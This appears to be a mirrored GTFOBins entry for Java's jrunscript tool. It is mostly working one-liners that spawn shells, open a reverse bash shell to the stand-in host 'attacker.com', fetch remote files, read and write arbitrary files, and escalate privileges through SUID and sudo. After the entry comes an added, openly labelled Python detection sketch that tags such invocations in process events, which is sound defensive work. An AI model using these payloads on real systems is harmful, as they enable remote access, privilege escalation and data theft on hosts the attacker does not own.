mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-06-04 13:36:01 +02:00
GTFOBins.github.io/_gtfobins/jrunscript.md
2020-06-10 23:04:59 +02:00

description: This tool is installed starting with Java SE 6.
functions:
  shell:
    - code: |
        jrunscript -e "exec('/bin/sh -c $@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')"
  reverse-shell:
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        jrunscript -e 'var host='"'""$RHOST""'"'; var port='"$RPORT"'; var p=new java.lang.ProcessBuilder("/bin/bash", "-i").redirectErrorStream(true).start(); var s=new java.net.Socket(host,port); var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); java.lang.Thread.sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  file-download:
    - description: Fetch a remote file via HTTP GET request.
      code: |
        URL=http://attacker.com/file_to_get
        LFILE=file_to_save
        jrunscript -e "cp('$URL','$LFILE')"
  file-write:
    - code: |
        jrunscript -e 'var fw=new java.io.FileWriter("./file_to_write"); fw.write("DATA"); fw.close();'
  file-read:
    - code: |
        jrunscript -e 'br = new BufferedReader(new java.io.FileReader("file_to_read")); while ((line = br.readLine()) != null) { print(line); }'
  suid:
    - description: This has been found working in macOS but failing on Linux systems.
      code: |
        ./jrunscript -e "exec('/bin/sh -pc $@|sh${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)')"
  sudo:
    - code: |
        sudo jrunscript -e "exec('/bin/sh -c $@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')"
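
A defender-side sketch, added here and not part of the GTFOBins entry: it tags process-execution events whose `jrunscript -e` script matches the function categories listed above and notes when the process ran with an effective UID of 0. The event fields (`argv`, `uid`, `euid`), the regex patterns and the sample events are assumptions constructed for illustration.

```python
import os
import re

# Script constructs mapped to this entry's function categories.
# Patterns are illustrative assumptions, not a vetted rule set.
INDICATORS = {
    "shell": re.compile(r"\bexec\s*\(|ProcessBuilder"),
    "reverse-shell": re.compile(r"java\.net\.Socket"),
    "file-download": re.compile(r"\bcp\s*\(\s*['\"]https?://"),
    "file-write": re.compile(r"FileWriter"),
    "file-read": re.compile(r"FileReader"),
}

def inline_scripts(argv):
    """Return the script text of every -e argument of a jrunscript call."""
    if not argv or os.path.basename(argv[0]) != "jrunscript":
        return []
    return [argv[i + 1] for i, arg in enumerate(argv[:-1]) if arg == "-e"]

def classify(event):
    """Tag one exec event (assumed fields: argv, uid, euid)."""
    tags = set()
    for script in inline_scripts(event["argv"]):
        tags |= {name for name, rx in INDICATORS.items() if rx.search(script)}
    # Privilege context is reported only alongside a script match.
    # sudo appears as uid == euid == 0; a SUID-root binary as euid 0 only.
    if tags and event["euid"] == 0:
        tags.add("suid" if event["uid"] != 0 else "root")
    return tags

# Constructed sample events, e.g. as decoded from execve audit records.
SAMPLE_EVENTS = [
    {"argv": ["jrunscript", "-e", "exec('/bin/sh')"], "uid": 0, "euid": 0},
    {"argv": ["/opt/jdk/bin/jrunscript", "-e",
              "var s=new java.net.Socket(host,port);"], "uid": 1000, "euid": 1000},
    {"argv": ["./jrunscript", "-e", "cp('http://example.invalid/f','out')"],
     "uid": 1000, "euid": 0},
    {"argv": ["jrunscript", "-e", "print(1+1)"], "uid": 1000, "euid": 1000},
    {"argv": ["java", "-jar", "app.jar"], "uid": 1000, "euid": 1000},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        tags = classify(ev)
        if tags:
            print(sorted(tags), " ".join(ev["argv"]))
```

Scripts loaded from a file rather than passed with `-e` are not inspected here; covering them means reading the referenced file at detection time.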